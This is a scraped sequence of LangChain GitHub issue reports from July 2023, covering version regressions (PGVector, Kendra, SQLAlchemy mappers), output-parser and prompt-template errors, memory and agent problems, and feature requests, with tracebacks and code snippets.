- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Executing the following command fails with langchain >= 0.0.228, and no error occurs for langchain <= 0.0.227:
```python
import langchain
import sqlalchemy
sqlalchemy.orm.configure_mappers()
```
Error:
```
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:515, in _class_resolver._resolve_name(self)
514 if rval is None:
--> 515 rval = d[token]
516 else:
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/util/_collections.py:346, in PopulateDict.__missing__(self, key)
345 def __missing__(self, key: Any) -> Any:
--> 346 self[key] = val = self.creator(key)
347 return val
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:483, in _class_resolver._access_cls(self, key)
481 return value
--> 483 return self.fallback[key]
KeyError: 'EmbeddingStore'
The above exception was the direct cause of the following exception:
InvalidRequestError Traceback (most recent call last)
Cell In[3], line 1
----> 1 sqlalchemy.orm.configure_mappers()
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:4167, in configure_mappers()
4099 def configure_mappers():
4100 """Initialize the inter-mapper relationships of all mappers that
4101 have been constructed thus far across all :class:`_orm.registry`
4102 collections.
(...)
4164
4165 """
-> 4167 _configure_registries(_all_registries(), cascade=True)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:4198, in _configure_registries(registries, cascade)
4192 Mapper.dispatch._for_class(Mapper).before_configured() # type: ignore # noqa: E501
4193 # initialize properties on all mappers
4194 # note that _mapper_registry is unordered, which
4195 # may randomly conceal/reveal issues related to
4196 # the order of mapper compilation
-> 4198 _do_configure_registries(registries, cascade)
4199 finally:
4200 _already_compiling = False
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:4239, in _do_configure_registries(registries, cascade)
4237 if not mapper.configured:
4238 try:
-> 4239 mapper._post_configure_properties()
4240 mapper._expire_memoizations()
4241 mapper.dispatch.mapper_configured(mapper, mapper.class_)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/mapper.py:2403, in Mapper._post_configure_properties(self)
2400 self._log("initialize prop %s", key)
2402 if prop.parent is self and not prop._configure_started:
-> 2403 prop.init()
2405 if prop._configure_finished:
2406 prop.post_instrument_class(self)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/interfaces.py:578, in MapperProperty.init(self)
571 """Called after all mappers are created to assemble
572 relationships between mappers and perform other post-mapper-creation
573 initialization steps.
574
575
576 """
577 self._configure_started = True
--> 578 self.do_init()
579 self._configure_finished = True
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/relationships.py:1632, in RelationshipProperty.do_init(self)
1630 self._check_conflicts()
1631 self._process_dependent_arguments()
-> 1632 self._setup_entity()
1633 self._setup_registry_dependencies()
1634 self._setup_join_conditions()
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/relationships.py:1849, in RelationshipProperty._setup_entity(self, _RelationshipProperty__argument)
1842 resolved_argument: _ExternalEntityType[Any]
1844 if isinstance(argument, str):
1845 # we might want to cleanup clsregistry API to make this
1846 # more straightforward
1847 resolved_argument = cast(
1848 "_ExternalEntityType[Any]",
-> 1849 self._clsregistry_resolve_name(argument)(),
1850 )
1851 elif callable(argument) and not isinstance(
1852 argument, (type, mapperlib.Mapper)
1853 ):
1854 resolved_argument = argument()
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:519, in _class_resolver._resolve_name(self)
517 rval = getattr(rval, token)
518 except KeyError as err:
--> 519 self._raise_for_name(name, err)
520 except NameError as n:
521 self._raise_for_name(n.args[0], n)
File ~/miniconda3/envs/mlflow-dev-env/lib/python3.8/site-packages/sqlalchemy/orm/clsregistry.py:500, in _class_resolver._raise_for_name(self, name, err)
490 raise exc.InvalidRequestError(
491 f"When initializing mapper {self.prop.parent}, "
492 f'expression "relationship({self.arg!r})" seems to be '
(...)
497 f"['{clsarg}']] = relationship()\""
498 ) from err
499 else:
--> 500 raise exc.InvalidRequestError(
501 "When initializing mapper %s, expression %r failed to "
502 "locate a name (%r). If this is a class name, consider "
503 "adding this relationship() to the %r class after "
504 "both dependent classes have been defined."
505 % (self.prop.parent, self.arg, name, self.cls)
506 ) from err
InvalidRequestError: When initializing mapper Mapper[CollectionStore(langchain_pg_collection)], expression 'EmbeddingStore' failed to locate a name ('EmbeddingStore'). If this is a class name, consider adding this relationship() to the <class 'langchain.vectorstores.pgvector.CollectionStore'> class after both dependent classes have been defined.
```
It's likely to be introduced by this PR https://github.com/hwchase17/langchain/pull/7370.
### Expected behavior
No error should occur. | sqlalchemy fails to initialize with KeyError "EmbeddingStore" | https://api.github.com/repos/langchain-ai/langchain/issues/7579/comments | 1 | 2023-07-12T04:18:26Z | 2023-07-12T07:35:27Z | https://github.com/langchain-ai/langchain/issues/7579 | 1,800,138,889 | 7,579 |
[
"hwchase17",
"langchain"
]
| https://github.com/hwchase17/langchain/blob/2667ddc6867421842fe027f1946644f452de8eb3/langchain/chains/base.py#L386-L393
when I have this:
```
chain = create_structured_output_chain(Categorization, llm, prompt, verbose=True)
response = chain.run(trx_description)
```
my `response` object is a dict not a str, but I got misled by the type assistance making me think it was a str. | chain.run doesn't necessarily return a `str` | https://api.github.com/repos/langchain-ai/langchain/issues/7578/comments | 16 | 2023-07-12T04:11:51Z | 2023-10-13T02:31:07Z | https://github.com/langchain-ai/langchain/issues/7578 | 1,800,131,260 | 7,578 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.230
### Who can help?
@raymond-yuan
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Fill in appropriate values for parameters
```
db = PGVector.from_documents(
embedding=embeddings,
documents=docs,
collection_name=COLLECTION_NAME,
connection_string=CONNECTION_STRING,
pre_delete_collection=True,
)
```
Produces:
```
Traceback (most recent call last):
File "create_pgvector_index_hr.py", line 70, in <module>
db = PGVector.from_documents(
File "/home/coder/venv-openai-slackbot/lib/python3.8/site-packages/langchain/vectorstores/pgvector.py", line 578, in from_documents
return cls.from_texts(
File "/home/coder/venv-openai-slackbot/lib/python3.8/site-packages/langchain/vectorstores/pgvector.py", line 453, in from_texts
return cls.__from(
File "/home/coder/venv-openai-slackbot/lib/python3.8/site-packages/langchain/vectorstores/pgvector.py", line 213, in __from
store = cls(
TypeError: ABCMeta object got multiple values for keyword argument 'connection_string'
```
and appears related to this change: https://github.com/hwchase17/langchain/blame/master/langchain/vectorstores/pgvector.py#L213-L220
### Expected behavior
Above code works with langchain==0.0.229
Code should not throw an exception as it did prior to 0.0.230 | PGVector.from_documents breaking from 0.0.229 to 0.0.230 | https://api.github.com/repos/langchain-ai/langchain/issues/7577/comments | 2 | 2023-07-12T02:50:01Z | 2023-07-13T03:26:29Z | https://github.com/langchain-ai/langchain/issues/7577 | 1,800,069,048 | 7,577 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version: 0.0.229
Platform: AWS Lambda execution
Python version: 3.9
I get the following error when creating the AmazonKendraRetriever using LangChain version 0.0.229.
Code to create retriever:
`retriever = AmazonKendraRetriever(index_id=kendra_index)`
Error:
```[ERROR] ValidationError: 1 validation error for AmazonKendraRetriever
__root__
Could not load credentials to authenticate with AWS client. Please check that credentials in the specified profile name are valid. (type=value_error)
Traceback (most recent call last):
File "/var/task/lambda_function.py", line 171, in lambda_handler
retriever = AmazonKendraRetriever(index_id=kendra_index)
File "/opt/python/langchain/load/serializable.py", line 74, in __init__
super().__init__(**kwargs)
File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__```
When using LangChain version 0.0.219 this error does not occur.
Issue also raised on aws-samples git repo with potential solution: https://github.com/aws-samples/amazon-kendra-langchain-extensions/issues/24
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Install latest version of Langchain
2. Follow instructions here: https://python.langchain.com/docs/modules/data_connection/retrievers/integrations/amazon_kendra_retriever
### Expected behavior
Error not thrown when creating AmazonKendraRetriever | AmazonKendraRetriever "Could not load credentials" error in latest release | https://api.github.com/repos/langchain-ai/langchain/issues/7571/comments | 1 | 2023-07-12T00:16:40Z | 2023-07-13T03:47:37Z | https://github.com/langchain-ai/langchain/issues/7571 | 1,799,948,758 | 7,571 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Current version of document loader for Notion DB doesn't supports following properties for metadata
- `unique_id`
- https://www.notion.so/help/unique-id
- `status`
- https://www.notion.so/help/guides/status-property-gives-clarity-on-tasks
- `people`
- useful property when you assign some task to assignees
### Suggestion:
I would like to make a PR to fix this issue if it's okay. | Issue: Document loader for Notion DB doesn't supports some properties | https://api.github.com/repos/langchain-ai/langchain/issues/7569/comments | 0 | 2023-07-12T00:02:03Z | 2023-07-12T07:34:56Z | https://github.com/langchain-ai/langchain/issues/7569 | 1,799,937,363 | 7,569 |
[
"hwchase17",
"langchain"
]
| ### System Info
python==3.9.17
langchain==0.0.190
Win 11 64 bit
### Who can help?
@hwchase17 @agol
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
# Instantiate the chain
example_gen_chain = QAGenerateChain.from_llm(ChatOpenAI())
example_gen_chain.apply_and_parse([{'doc': data[2]}])
[Out]:
ValueError Traceback (most recent call last)
Cell In[36], line 1
----> 1 example_gen_chain.apply_and_parse([{'doc': data[2]}])
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\chains\llm.py:257, in LLMChain.apply_and_parse(self, input_list, callbacks)
255 """Call apply and then parse the results."""
256 result = self.apply(input_list, callbacks=callbacks)
--> 257 return self._parse_result(result)
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\chains\llm.py:263, in LLMChain._parse_result(self, result)
259 def _parse_result(
260 self, result: List[Dict[str, str]]
261 ) -> Sequence[Union[str, List[str], Dict[str, str]]]:
262 if self.prompt.output_parser is not None:
--> 263 return [
264 self.prompt.output_parser.parse(res[self.output_key]) for res in result
265 ]
266 else:
267 return result
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\chains\llm.py:264, in <listcomp>(.0)
259 def _parse_result(
260 self, result: List[Dict[str, str]]
261 ) -> Sequence[Union[str, List[str], Dict[str, str]]]:
262 if self.prompt.output_parser is not None:
263 return [
--> 264 self.prompt.output_parser.parse(res[self.output_key]) for res in result
265 ]
266 else:
267 return result
File ~\anaconda3\envs\nlp-openai-langchain\lib\site-packages\langchain\output_parsers\regex.py:28, in RegexParser.parse(self, text)
26 else:
27 if self.default_output_key is None:
---> 28 raise ValueError(f"Could not parse output: {text}")
29 else:
30 return {
31 key: text if key == self.default_output_key else ""
32 for key in self.output_keys
33 }
ValueError: Could not parse output: QUESTION: What is the fabric composition of the Maine Expedition Shirt with PrimaLoft®?
ANSWER: The fabric composition of the Maine Expedition Shirt with PrimaLoft® is 85% premium wool and 15% nylon.
```
### Expected behavior
Returns parsed output. | ` ValueError: Could not parse output` when using `QAGenerateChain`'s `.apply_and_parse()` method | https://api.github.com/repos/langchain-ai/langchain/issues/7559/comments | 6 | 2023-07-11T19:44:49Z | 2023-10-31T16:06:20Z | https://github.com/langchain-ai/langchain/issues/7559 | 1,799,649,527 | 7,559 |
[
"hwchase17",
"langchain"
]
| ### Feature request
There are tools with `func` but whose implementation of coroutine would be just same. E.g.,
```python
def adder(x, y):
return x+y
async def aadder(x, y):
return x+y
adder_tool = Tool(func=adder, coroutine=aadder, ...)
```
I have to define `adder` and `aadder` redundantly.
Of course the logic can be abstracted within the two definitions, but I'd prefer just having the same function and reuse the `func` at the async calling. A possible implementation would look like this
at [this line](https://github.com/hwchase17/langchain/blob/master/langchain/tools/base.py#L453C1-L473C65)
```python
async def _arun(
self,
*args: Any,
run_manager: Optional[AsyncCallbackManagerForToolRun] = None,
**kwargs: Any,
) -> Any:
"""Use the tool asynchronously."""
if self.coroutine:
...
elif self.default_coroutine: # introducing some parameter
return self.run(*args, run_manager=run_manager, **kwargs)
raise NotImplementedError("Tool does not support async")
```
with this the adding `adder` will look like this:
```python
def adder(x, y):
return x+y
adder_tool = Tool(func=adder, default_coroutine=True, ...)
```
### Motivation
Simplify function documentations
### Your contribution
I can make a PR as proposed if it's the right approach. | Use `func` as a default `coroutine` method in Tool instantiation | https://api.github.com/repos/langchain-ai/langchain/issues/7558/comments | 2 | 2023-07-11T19:23:13Z | 2023-10-17T16:04:49Z | https://github.com/langchain-ai/langchain/issues/7558 | 1,799,618,568 | 7,558 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Introduce a follow-up query recommender callback to enhance user experience and engagement in case of chatbot use case.
The recommender callback will suggest relevant follow-up queries generated by LLM based on the user's conversation history, facilitating smoother interactions.
The proposed flow is as follows:
- Utilize the configured memory to recommend follow-up queries by analyzing the chat history.
- In the absence of configured memory, leverage the current question and answer to suggest follow-up queries.
Usage: It's up to the user how they want to utilize these recommended queries
### Motivation
The inclusion of this feature would greatly benefit various chatbot use cases.
By suggesting follow-up queries, the chatbot can proactively guide the conversation, helping users navigate complex interactions more efficiently. This feature has the potential to enhance user satisfaction and streamline the overall user experience. While the exact extent of its usefulness may vary, it is a valuable addition that can significantly improve the chatbot's capabilities.
### Your contribution
I can work on this, let me know your thoughts @hwchase17 | Follow-up Query Recommender Callback | https://api.github.com/repos/langchain-ai/langchain/issues/7557/comments | 2 | 2023-07-11T18:18:50Z | 2023-12-21T16:07:34Z | https://github.com/langchain-ai/langchain/issues/7557 | 1,799,513,554 | 7,557 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain 0.230
python 3.10
From first example of using calculator from: https://learn.deeplearning.ai/langchain/lesson/7/agents
> Entering new chain...
ACTION: json
{
"action": "Calculator",
"action_input": "25% of 300"
}
The text is what the ChatOutputParser in agents/chat/output_parser.py gets (I prefixed it with ACTION in my print statement).
The word 'json' is now prefixing the JSON blob from the ChatOpenAI LLM which causes the agent to fail. One possible solution that I verified work but not sure if it's the right one is checking if it prefixes with json and just remove that:
if action.startswith("json"):
action = action[4:]
This seems to work and lets both the first two examples in the tutorial work.
### Who can help?
@hwchase17 and @agola11 for LLM/Chat wrappers/Agents.
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce behavior.
Run source code from @hwchase17 Deeplearning class: https://learn.deeplearning.ai/langchain/lesson/7/agents
The calculator and wikipedia examples don't run.
### Expected behavior
The calculator and wikipedia examples work by parsing the "new?" output from ChatOpenAI in the tutorial. | Using Agent - ChatOpenAI - response can't be parsed because it starts with 'json' for next action (RC identified and fix proposed) | https://api.github.com/repos/langchain-ai/langchain/issues/7554/comments | 5 | 2023-07-11T16:48:21Z | 2023-10-10T16:15:58Z | https://github.com/langchain-ai/langchain/issues/7554 | 1,799,345,871 | 7,554 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain version: '0.0.230'
llama-index version: '0.7.4'
python: 3.10.11
### Who can help?
@hwchase17
@agola11
@eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**When I'm trying to use GPTIndexChatMemory to embed my conversation and store the whole of it, this feature (memory) doesn't work anymore, and this is my code, also I want to save the memory in a folder with its embeddings and I can't**
```
from llama_index.langchain_helpers.memory_wrapper import GPTIndexChatMemory, GPTIndexMemory
from langchain.chat_models import ChatOpenAI
from langchain.agents import AgentType
from llama_index import ServiceContext
from llama_index import GPTListIndex
from langchain.embeddings import OpenAIEmbeddings
llm = ChatOpenAI(temperature=0)
embed_model = LangchainEmbedding(OpenAIEmbeddings())
service_context = ServiceContext.from_defaults(embed_model=embed_model)
index = GPTListIndex([], service_context=service_context)
memory = GPTIndexChatMemory(
index=index,
memory_key="chat_history",
query_kwargs={"response_mode": "compact", "service_context":service_context},
input_key="input",
return_messages=True,
return_source= True
)
agent_executor = initialize_agent(
[], llm, verbose = True,agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, memory=memory, handle_parsing_errors="Check your output and make sure it conforms!"
)
agent_executor.agent.llm_chain.prompt.template = """Assistant is a large language model trained by OpenAI.
Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.
Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.
Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.
please use the following format:
AI: [your response here]
Begin!
Previous conversation history:
{chat_history}
New input: {input}
{agent_scratchpad}"""
print(agent_executor.run("my name is zeyad"))
```
this would be the output for the first print statement.
**AI: Hello Zeyad! How can I assist you today?**
`print("Do you know my name?")`
**this would be the output for the first print statement (unexcepted output), one week ago it was working fine without any problems.**
**AI: As an AI language model, I don't have access to personal information unless you provide it to me. Therefore, I don't know your name unless you tell me. Is there anything specific you would like assistance with?**
### Expected behavior
the expected output for the second statement must be:
AI: Yes, you told me before that your name is Zeyad.
**I really appreciate any help you can provide.** | GPTIndexChatMemory doesn't work as expected with langchain and the agent doesn't use the chat history | https://api.github.com/repos/langchain-ai/langchain/issues/7552/comments | 1 | 2023-07-11T16:38:22Z | 2023-10-17T16:04:55Z | https://github.com/langchain-ai/langchain/issues/7552 | 1,799,329,321 | 7,552 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain: 0.0.230
Python: 3.10
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have a dictionary in python
```python
dict = {
"keyfeatures": [
{
"title": "Search for Charitable Activities",
"description": "The system must provide a search function that allows users to enter keywords and returns a list of charitable activities that match those keywords."
},
{
"title": "Display Charitable Activities",
"description": "The system must display the search results in a user-friendly format."
},
{
"title": "Filter and Sort Charitable Activities",
"description": "The system must provide options for users to filter and sort the search results."
},
{
"title": "View Details of a Charitable Activity",
"description": "The system must allow users to select a charitable activity from the search results and view more detailed information about it."
},
{
"title": "Save or Bookmark Charitable Activities",
"description": "The system must allow users to save or bookmark charitable activities that they're interested in."
}
]
}
```
i convert the dictionary in a json string
```python
json_string = json.dumps(dict)
```
and i obtain the following string
```json
{"keyfeatures": [{"title": "Search for Charitable Activities", "description": "The system must provide a search function that allows users to enter keywords and returns a list of charitable activities that match those keywords."}, {"title": "Display Charitable Activities", "description": "The system must display the search results in a user-friendly format."}, {"title": "Filter and Sort Charitable Activities", "description": "The system must provide options for users to filter and sort the search results."}, {"title": "View Details of a Charitable Activity", "description": "The system must allow users to select a charitable activity from the search results and view more detailed information about it."}, {"title": "Save or Bookmark Charitable Activities", "description": "The system must allow users to save or bookmark charitable activities that they're interested in."}]}
```
if i pass that string to an AIMessagePromptTemplate
```python
AIMessagePromptTemplate.from_template(msg)
```
i get the following error:
```text
File "/home/andrea/PycharmProjects/ArchAI/venv/lib/python3.10/site-packages/langchain/prompts/chat.py", line 85, in from_template
prompt = PromptTemplate.from_template(template, template_format=template_format)
File "/home/andrea/PycharmProjects/ArchAI/venv/lib/python3.10/site-packages/langchain/prompts/prompt.py", line 145, in from_template
return cls(
File "/home/andrea/PycharmProjects/ArchAI/venv/lib/python3.10/site-packages/langchain/load/serializable.py", line 74, in __init__
super().__init__(**kwargs)
File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for PromptTemplate
__root__
Invalid prompt schema; check for mismatched or missing input parameters. '"title"' (type=value_error)
```
i have already added f-string formater with multiple curly-brackets but still fail
thanks in advance
### Expected behavior
the PromptMessage must import a formatted JSON string correctly without interfere with internal template curly-brackets format | Pass a JSON string and get an error mismatched or missing input parameter | https://api.github.com/repos/langchain-ai/langchain/issues/7551/comments | 3 | 2023-07-11T16:34:25Z | 2023-07-12T00:44:36Z | https://github.com/langchain-ai/langchain/issues/7551 | 1,799,323,572 | 7,551 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.225 also tested with 0.0.229
I can only reproduce it in Azure, I cant reproduce it locally.
### Who can help?
I have a simple python app with streamlit and langchain, I am deploying this to Azure via CI/CD with the following YAML definition
stages:
- stage: Build
displayName: Build stage
jobs:
- job: BuildJob
pool:
vmImage: $(vmImageName)
steps:
- task: UsePythonVersion@0
inputs:
versionSpec: '$(pythonVersion)'
displayName: 'Use Python $(pythonVersion)'
- script: |
python -m venv antenv
source antenv/bin/activate
python -m pip install --upgrade pip
pip install setup streamlit
pip install --target="./.python_packages/lib/site-packages" -r ./requirements.txt
workingDirectory: $(projectRoot)
displayName: "Install requirements"
- task: ArchiveFiles@2
displayName: 'Archive files'
inputs:
rootFolderOrFile: '$(projectRoot)'
includeRootFolder: false
archiveType: zip
archiveFile: $(Build.ArtifactStagingDirectory)/$(Build.BuildId).zip
replaceExistingArchive: true
- upload: $(Build.ArtifactStagingDirectory)/$(Build.BuildId).zip
displayName: 'Upload package'
artifact: drop
- stage: Deploy
displayName: 'Deploy Web App'
dependsOn: Build
condition: succeeded()
jobs:
- deployment: DeploymentJob
pool:
vmImage: $(vmImageName)
environment: $(environmentName)
strategy:
runOnce:
deploy:
steps:
- task: UsePythonVersion@0
inputs:
versionSpec: '$(pythonVersion)'
displayName: 'Use Python version'
- task: AzureAppServiceSettings@1
displayName: 'Set App Settings'
inputs:
azureSubscription: 'AzureAIPocPrincipal'
appName: 'test'
resourceGroupName: 'AzureAIPoc'
appSettings: |
[
{
"name": "ENABLE_ORYX_BUILD",
"value": 1
},
{
"name": "SCM_DO_BUILD_DURING_DEPLOYMENT",
"value": 1
},
{
"name": "POST_BUILD_COMMAND",
"value": "pip install -r ./requirements.txt"
}
]
- task: AzureWebApp@1
displayName: 'Deploy Azure Web App : {{ webAppName }}'
inputs:
azureSubscription: 'AzureAIPocPrincipal'
appType: 'webAppLinux'
deployToSlotOrASE: true
resourceGroupName: 'AzureAIPoc'
slotName: 'production'
appName: 'test'
package: '$(Pipeline.Workspace)/drop/$(Build.BuildId).zip'
startUpCommand: 'python -m streamlit run app/home.py --server.port 8000 --server.address 0.0.0.0'
My requirements file is:
langchain==0.0.225
streamlit
openai
python-dotenv
pinecone-client
streamlit-chat
chromadb
tiktoken
pymssql
typing-inspect==0.8.0
typing_extensions==4.5.0
However I am getting the following error:
TypeError: issubclass() arg 1 must be a class
Traceback:
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "/tmp/8db82251b0e58bc/app/pages/xxv0.2.py", line 6, in <module>
import langchain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/agents/__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/agents/agent.py", line 26, in <module>
from langchain.chains.base import Chain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/chains/__init__.py", line 2, in <module>
from langchain.chains.api.base import APIChain
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/chains/api/base.py", line 13, in <module>
from langchain.chains.api.prompt import API_RESPONSE_PROMPT, API_URL_PROMPT
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/chains/api/prompt.py", line 2, in <module>
from langchain.prompts.prompt import PromptTemplate
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/prompts/__init__.py", line 12, in <module>
from langchain.prompts.example_selector import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/prompts/example_selector/__init__.py", line 4, in <module>
from langchain.prompts.example_selector.semantic_similarity import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/prompts/example_selector/semantic_similarity.py", line 8, in <module>
from langchain.embeddings.base import Embeddings
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/embeddings/__init__.py", line 29, in <module>
from langchain.embeddings.sagemaker_endpoint import SagemakerEndpointEmbeddings
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/embeddings/sagemaker_endpoint.py", line 7, in <module>
from langchain.llms.sagemaker_endpoint import ContentHandlerBase
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/llms/__init__.py", line 52, in <module>
from langchain.llms.vertexai import VertexAI
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/llms/vertexai.py", line 14, in <module>
from langchain.utilities.vertexai import (
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/utilities/__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/utilities/apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/document_loaders/__init__.py", line 43, in <module>
from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/langchain/document_loaders/embaas.py", line 54, in <module>
class BaseEmbaasLoader(BaseModel):
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 539, in prepare
self.populate_validators()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 801, in populate_validators
*(get_validators() if get_validators else list(find_validators(self.type_, self.model_config))),
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/validators.py", line 696, in find_validators
yield make_typeddict_validator(type_, config)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/validators.py", line 585, in make_typeddict_validator
TypedDictModel = create_model_from_typeddict(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/annotated_types.py", line 35, in create_model_from_typeddict
return create_model(typeddict_cls.__name__, **kwargs, **field_definitions)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/main.py", line 972, in create_model
